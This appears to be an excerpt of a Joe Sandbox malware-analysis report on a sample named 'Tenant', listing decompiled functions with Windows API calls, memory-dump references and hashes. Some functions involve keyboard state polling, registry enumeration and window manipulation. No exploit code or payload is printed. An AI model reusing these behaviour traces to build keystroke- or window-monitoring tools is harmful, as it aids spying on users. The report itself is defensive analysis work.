                                                                                        Function 00AFAC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                          • Part of subcall function 00AFAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AFAA6F
                                                                                          • Part of subcall function 00AFAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AFAA82
                                                                                          • Part of subcall function 00AFAA52: GetCurrentThreadId.KERNEL32 ref: 00AFAA89
                                                                                          • Part of subcall function 00AFAA52: AttachThreadInput.USER32(00000000), ref: 00AFAA90
                                                                                        • GetFocus.USER32 ref: 00AFAC2A
                                                                                          • Part of subcall function 00AFAA9B: GetParent.USER32(?), ref: 00AFAAA9
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00AFAC73
                                                                                        • EnumChildWindows.USER32(?,00AFACEB), ref: 00AFAC9B
                                                                                        • __swprintf.LIBCMT ref: 00AFACB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                        • String ID: %s%d
                                                                                        • API String ID: 1941087503-1110647743
                                                                                        • Opcode ID: 8b79ad39984f7732b0a6c34597bbdec89536387431f101cb73b358d7c9f85063
                                                                                        • Instruction ID: d2ae59f6efa20210b659a6251fbb7f5ca72e0eb7769d1f113301e924906ecff7
                                                                                        • Opcode Fuzzy Hash: 8b79ad39984f7732b0a6c34597bbdec89536387431f101cb73b358d7c9f85063
                                                                                        • Instruction Fuzzy Hash: 3E11D2B5200208ABCF11BFE0CE86FFA376CAF54700F104075FE0CAA142CA7059498B71
                                                                                        Function 00B022E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00B02318
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                        • API String ID: 3964851224-769500911
                                                                                        • Opcode ID: 04812b317dfa3d585a1f98e5f5a539395ff3ecca4c129a162c20d2f6e234451b
                                                                                        • Instruction ID: 820604c49ddcbc1d97eee6d081752cce79f0741fa9e74da891ec78f34640922b
                                                                                        • Opcode Fuzzy Hash: 04812b317dfa3d585a1f98e5f5a539395ff3ecca4c129a162c20d2f6e234451b
                                                                                        • Instruction Fuzzy Hash: 87113030910118DFCF40EFA4DA559EEB7F8FF15344B5084D9E81567292DB365E0ACB50
                                                                                        Function 00B1F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B1F2F0
                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B1F320
                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B1F453
                                                                                        • CloseHandle.KERNEL32(?), ref: 00B1F4D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2364364464-0
                                                                                        • Opcode ID: 6bd7c0466b0644f639bf48f31d30048c40123e654f3c44d60bf5de16a06fe63a
                                                                                        • Instruction ID: 18b91fb165d5ed72fb48f9e2da58923d019a8e6690ae14bcb20bd473d0236c33
                                                                                        • Opcode Fuzzy Hash: 6bd7c0466b0644f639bf48f31d30048c40123e654f3c44d60bf5de16a06fe63a
                                                                                        • Instruction Fuzzy Hash: FD8180716043019FD720EF28D982B6AB7E5AF89710F14896DF999DB3D2D7B0AC40CB91
                                                                                        Function 00B20697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00B2147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2040D,?,?), ref: 00B21491
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2075D
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2079C
                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B207E3
                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00B2080F
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B2081C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3440857362-0
                                                                                        • Opcode ID: 71fc5b2639df4e4aefc78b8795713cfbafd353b425deeecf50fc8aa6a22568fe
                                                                                        • Instruction ID: fc14ad127806d594bde89488067f362ffe857474cbb9f289d582a172a1f07b6b
                                                                                        • Opcode Fuzzy Hash: 71fc5b2639df4e4aefc78b8795713cfbafd353b425deeecf50fc8aa6a22568fe
                                                                                        • Instruction Fuzzy Hash: 0F515871218208AFD704EF64D991E6EB7E9FF88704F00895DF599872A2DB31E904CB52
                                                                                        Function 00B0EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B0EC62
                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B0EC8B
                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B0ECCA
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B0ECEF
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B0ECF7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1389676194-0
                                                                                        • Opcode ID: 95d0433580a7ac5e9cebd0a78fc00949e6c65f62ec2d612bc9adf2aa94f73b98
                                                                                        • Instruction ID: a7da9e5f7c5a535bbf727ec0b2c9fbd912317bf04b484f9b1439b4a22d2c6bbc
                                                                                        • Opcode Fuzzy Hash: 95d0433580a7ac5e9cebd0a78fc00949e6c65f62ec2d612bc9adf2aa94f73b98
                                                                                        • Instruction Fuzzy Hash: 14512A35A00109DFDB05EF64CA85EAEBBF5EF49314B148499F809AB3A2CB31ED51DB50
                                                                                        Function 00B2A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2e4ffbb8d0c0fa43396913549419ec3d0b1e2fce361bb43850773b74a67f250d
                                                                                        • Instruction ID: c9930dbab9298a74b4f4cb76a029f0593f4ecfbce78a7733113e6b64ee72d57b
                                                                                        • Opcode Fuzzy Hash: 2e4ffbb8d0c0fa43396913549419ec3d0b1e2fce361bb43850773b74a67f250d
                                                                                        • Instruction Fuzzy Hash: 4C41E635904224AFD710DF28EC94FA9BBF8EB09310F1501A5F81EA72F2CB70AD41DA55
                                                                                        Function 00AA2714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00AA2727
                                                                                        • ScreenToClient.USER32(00B677B0,?), ref: 00AA2744
                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00AA2769
                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00AA2777
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                        • String ID:
                                                                                        • API String ID: 4210589936-0
                                                                                        • Opcode ID: 69ffface751298ba5701945611c316b001db52a0f5377ad0626323767db7c57f
                                                                                        • Instruction ID: 4b84c0223e2fa8729bcade4572ef2405befe4b0d651b177eeb4340732d564044
                                                                                        • Opcode Fuzzy Hash: 69ffface751298ba5701945611c316b001db52a0f5377ad0626323767db7c57f
                                                                                        • Instruction Fuzzy Hash: 35412E7550411AFBDF159F68C844AE9FB74BB06334F60835AF829972D0CB319E60DB91
                                                                                        Function 00AF95D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00AF95E8
                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00AF9692
                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AF969A
                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00AF96A8
                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AF96B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3382505437-0
                                                                                        • Opcode ID: f3b6965c66606a69af5b033f92a6df94e50ca214d8146978a3b1509893d7771b
                                                                                        • Instruction ID: 2901585ae1a24d4d17234f9dc99f3f952512d5dbcbe13facc2170532c789fa17
                                                                                        • Opcode Fuzzy Hash: f3b6965c66606a69af5b033f92a6df94e50ca214d8146978a3b1509893d7771b
                                                                                        • Instruction Fuzzy Hash: 3D319A7190021DEBDB14CFA8D94DBAE7BB5EF44315F204229FA25EB2D0C7B09924DB91
                                                                                        Function 00AFBD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00AFBD9D
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AFBDBA
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AFBDF2
                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AFBE18
                                                                                        • _wcsstr.LIBCMT ref: 00AFBE22
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 3902887630-0
                                                                                        • Opcode ID: fcd0a5092b90d567f19c58c3c2f648c9cc75bd982447a3f66792e6c337890229
                                                                                        • Instruction ID: db5885137d33907f32ff72e9f6031480f08d4c3a9e473f7698b24eda50ddb22e
                                                                                        • Opcode Fuzzy Hash: fcd0a5092b90d567f19c58c3c2f648c9cc75bd982447a3f66792e6c337890229
                                                                                        • Instruction Fuzzy Hash: 5621C532214208BFEB255B75DC49EBF7BBCDF45760F11802DFA09DA191EF619C5092A1
                                                                                        Function 00B2B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00B2B804
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B2B829
                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B2B841
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00B2B86A
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B1155C,00000000), ref: 00B2B888
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2294984445-0
                                                                                        • Opcode ID: f7dcc17cf672c45f5dd60932b8348feb6c676c6c53a85eb5d42f739b1d663e9d
                                                                                        • Instruction ID: ce317610eceaaa2b6352241180616b6047e428496c05406db01cbd65eabf023d
                                                                                        • Opcode Fuzzy Hash: f7dcc17cf672c45f5dd60932b8348feb6c676c6c53a85eb5d42f739b1d663e9d
                                                                                        • Instruction Fuzzy Hash: 28218031924225AFCB149F39AC48E6A37E8EB05724F214778F929D72E0DF308C10DB80
                                                                                        Function 00B16138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 00B16159
                                                                                        • GetForegroundWindow.USER32 ref: 00B16170
                                                                                        • GetDC.USER32(00000000), ref: 00B161AC
                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00B161B8
                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00B161F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                        • String ID:
                                                                                        • API String ID: 4156661090-0
                                                                                        • Opcode ID: a002ecc8f711160aa0ccb9bb5db72849b3878683c7dbb9fcd7574ba719a6071f
                                                                                        • Instruction ID: d5bc45e10eda528090d2cc98ca197f35ffd714985e819d3b8a0b105bdc581862
                                                                                        • Opcode Fuzzy Hash: a002ecc8f711160aa0ccb9bb5db72849b3878683c7dbb9fcd7574ba719a6071f
                                                                                        • Instruction Fuzzy Hash: F121C375A00204AFD714EF65DD89A9EBBF9EF88310F1484A9F94A97352CF30AD50CB90
                                                                                        Function 00AA16CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA1729
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AA1738
                                                                                        • BeginPath.GDI32(?), ref: 00AA174F
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AA1778
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                        • String ID:
                                                                                        • API String ID: 3225163088-0
                                                                                        • Opcode ID: bc7a0f1faad38e1ba726bdcfa343c825feaee07a8f7d4c7ae6de932e1e495ece
                                                                                        • Instruction ID: 236232d2b729373b339a903e14fe470e07559f28e9562ed39cb91700fa8fa34e
                                                                                        • Opcode Fuzzy Hash: bc7a0f1faad38e1ba726bdcfa343c825feaee07a8f7d4c7ae6de932e1e495ece
                                                                                        • Instruction Fuzzy Hash: F8215C30954208FBDB10DF2ADD48B6D7BA9EB41329F24422AF815972E0DFB59D91CF90
                                                                                        Function 00AFC837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 2931989736-0
                                                                                        • Opcode ID: 0f1568c57a27f0f08d7268de1ace12c75b3a1429a9a60957b1ec4cfd17daf584
                                                                                        • Instruction ID: 25874d9a9eb562d30c1163a085e4304db7439f3166ece9b41ecf5d48eca85618
                                                                                        • Opcode Fuzzy Hash: 0f1568c57a27f0f08d7268de1ace12c75b3a1429a9a60957b1ec4cfd17daf584
                                                                                        • Instruction Fuzzy Hash: D1019272B0020D7BE21466529F82FBB73ACDE61BE4F144029FF0697642F761DE1592E0
                                                                                        Function 00B0504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B05075
                                                                                        • __beginthreadex.LIBCMT ref: 00B05093
                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00B050A8
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B050BE
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B050C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                        • String ID:
                                                                                        • API String ID: 3824534824-0
                                                                                        • Opcode ID: f20cae70d2308791b4d9fb86bc39bb3c74bb0ac7d9ede032c0a400d3b910c74d
                                                                                        • Instruction ID: 8d7aeaae0f76be741103ecdba623ca106e8e7b593710a950a954aec71e9ea72a
                                                                                        • Opcode Fuzzy Hash: f20cae70d2308791b4d9fb86bc39bb3c74bb0ac7d9ede032c0a400d3b910c74d
                                                                                        • Instruction Fuzzy Hash: E2110872908708BBC7119BA89C18A9F7FACEB45324F24029AF814D33D0DEB589008BF0
                                                                                        Function 00AF8E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF8E3C
                                                                                        • GetLastError.KERNEL32(?,00AF8900,?,?,?), ref: 00AF8E46
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00AF8900,?,?,?), ref: 00AF8E55
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00AF8900,?,?,?), ref: 00AF8E5C
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF8E73
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
